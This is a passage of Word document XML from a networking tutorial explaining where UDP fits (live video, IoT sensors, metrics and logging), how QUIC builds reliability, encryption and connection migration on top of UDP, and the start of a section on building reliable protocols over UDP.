        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live video:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A frame that arrives late is worse than a frame that's dropped (causes stutter vs. brief artifact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC643D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPTV, live sports:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Millions of concurrent viewers — maintaining TCP state for each would be resource-prohibitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE4436" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Most modern streaming (Netflix, YouTube) uses TCP/HTTP (HLS/DASH) for VOD. The buffering (30 seconds ahead) absorbs TCP's latency. But latency-critical live use cases (&lt; 1 second latency) use UDP-based protocols (SRT, WebRTC, RIST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BB377" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.5 IoT / Sensor Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0D325" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770F01B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained devices:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> IoT sensors have minimal RAM/CPU. TCP's state machine is too heavy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B82874" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Frequent small updates:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Temperature reading every second, 20 bytes each. TCP overhead (handshake, ACKs) is disproportionate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4D285" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Loss-tolerant:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Missing one temperature reading out of 60 per minute is irrelevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CECD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Battery-powered:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> UDP sends one packet and sleeps. TCP requires keeping connection alive (heartbeats) — drains battery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056DA9C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CoAP (Constrained Application Protocol):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> REST-like protocol over UDP, designed for IoT. Adds minimal reliability (confirmable messages with ACK) when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D58BA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.6 Metrics and Logging (StatsD, syslog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11D168" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B4399" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Application sends metrics fire-and-forget. If the metrics collector is down, the application doesn't block or slow down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CFCA1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Loss-acceptable:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Losing 0.1% of metric data points doesn't affect dashboards or alerts meaningfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F4813B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance-critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Instrumenting hot code paths with TCP calls to a metrics server would add latency. UDP sendto() completes in microseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E9EFC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="28B11F95">
          <v:rect id="_x0000_i5019" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5E843" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. QUIC — The "Best of Both Worlds" Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC2D74" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Why QUIC Exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8902E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP's fundamental limitations (unfixable without a new protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C503B22" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HOL blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Can't be fixed without changing TCP semantics (ordered byte stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF95C19" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Handshake overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Minimum 1 RTT. TLS adds another 1–2 RTTs. Minimum 2–3 RTTs for new HTTPS connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454EEF44" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ossification:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Middleboxes (firewalls, NATs) inspect TCP headers. Any TCP extension is often broken by intermediaries. TCP can't be evolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DE8C9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection tied to IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Switching networks (WiFi → cellular) changes IP → TCP connection dies → new handshake required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62181BC4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC's solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Build a new transport protocol on top of UDP that provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE299C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Reliability (like TCP) — but per-stream, not per-connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF341E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Encryption (TLS 1.3 integrated) — 0–1 RTT handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F32B3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Multiplexing (multiple independent streams) — no cross-stream HOL blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588C1AA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection migration (connection ID-based, not IP-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A58EB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 How QUIC Relates to TCP and UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2181E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554348E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP/TLS/HTTP stack:                  QUIC/HTTP stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A70F696" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>┌──────────┐                         ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0D1E0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│  HTTP/2  │                         │  HTTP/3  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70621B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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t xml:space="preserve">                         </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p>
    <w:p w14:paraId="0E707696" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   TLS    │                         │   QUIC   │  ← Reliability + encryption + multiplexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8204A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                         </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p>
    <w:p w14:paraId="15F84771" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   TCP    │                         │   UDP    │  ← Just a transport substrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9814E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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t xml:space="preserve">                         </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p>
    <w:p w14:paraId="63428392" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   IP     │                         │   IP     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE6A29" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>└──────────┘                         └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB4C82" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC uses UDP as a "dumb pipe"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — UDP provides port multiplexing and nothing else. QUIC implements all reliability, ordering, congestion control, and encryption in userspace on top.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2F81D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 QUIC's Key Advantages Over TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE51EB0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. No HOL blocking (per-stream independence):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD741F1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009AC12" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP/HTTP/2: Stream A packet lost → Streams A, B, C ALL blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1AE922" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>QUIC/HTTP/3: Stream A packet lost → Only Stream A blocked. B and C delivered immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E98D7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. 0-RTT connection establishment (on reconnect):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA41A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE488F0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP + TLS 1.3:  1 RTT (TCP) + 1 RTT (TLS) = 2 RTT minimum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D665C04" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>QUIC (new):     1 RTT (combined crypto + transport handshake)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4F6D2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>QUIC (resume):  0 RTT (data sent in first packet!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA94E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Connection migration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB51F6D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65838FCE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>User walks from WiFi to cellular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330D1AB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP: IP changes → connection dies → new 3-RTT handshake → application state lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E83BF5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>QUIC: Connection ID unchanged → seamless migration → zero disruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250C747" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Userspace implementation (evolvable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF9ABC8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP is in the kernel — changing it requires OS updates across billions of devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FE44E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>QUIC is in userspace (part of the application/library) — can be updated at application deployment speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46267D92" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Middleboxes can't inspect QUIC (it's encrypted UDP) — no ossification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC1FFB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="2E156CC6">
          <v:rect id="_x0000_i5020" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53C722" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Building Reliable Protocols on UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B5339" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 When and Why to Build on UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49846C73" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reasons to implement custom reliability on UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78416133" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Need reliability but NOT TCP's specific semantics (e.g., per-stream ordering without HOL blocking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AD12B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Need partial reliability (some messages must be reliable, others can be lost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E775157" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Need custom congestion control (TCP's CUBIC/BBR doesn't suit your application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12782DAE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Need multicast/broadcast with some reliability.</w:t>
      </w:r>
